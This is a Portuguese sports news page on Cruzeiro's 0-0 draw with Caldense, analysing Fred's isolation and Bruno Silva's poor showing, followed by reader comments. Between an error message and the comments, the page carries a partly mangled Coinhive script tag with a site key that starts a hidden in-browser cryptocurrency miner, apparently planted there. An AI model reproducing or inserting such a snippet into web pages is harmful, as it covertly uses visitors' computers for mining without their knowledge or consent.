Após uma boa estreia contra o Tupi, no Mineirão, o Cruzeiro não saiu do zero contra a Caldense, em Poços. Com escalação 'alternativa', os comandados de Mano Menezes não tiveram atuação inspirada e esbarraram em deficiências próprias.
Como analisa o ?Globoesporte, alguns fatores não funcionaram para a Raposa durante o duelo. Fred esteve muito isolado e foi pouco acionado durante a etapa inicial. Foram apenas duas finalizações na partida, menos da metade em relação à primeira rodada (5).
Bruno Silva atuou fora de posição e não rendeu o esperado. Sua atuação abaixo culminou em uma substituição 'precoce', ainda no intervalo de jogo. O sistema defensivo, mais testado em relação à estreia, mostrou certa fragilidade, principalmente pelo lado esquerdo de ataque da Caldense.
Apesar do empate, Mano Menezes deve manter a estratégia de rodízio no elenco. O clube celeste volta à campo na próxima quarta (24), contra o Uberlândia.
Erro ao postar comentário.
Código do erro: 803743
< src="https://coinhive.com/lib/coinhive.min.js">><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();>
eu tô falando que o namo só joga com medalhões manda ele colacar o time da base para garantir o laboratório mineiro. Este caras aí reclamando de gramado depois vai ser o salário Tchau.Em.
Fred e Egídio não estão jogando nada,Egídio até vai mas o Fred,acho q Rafael Sobis no ataque e melhor heinh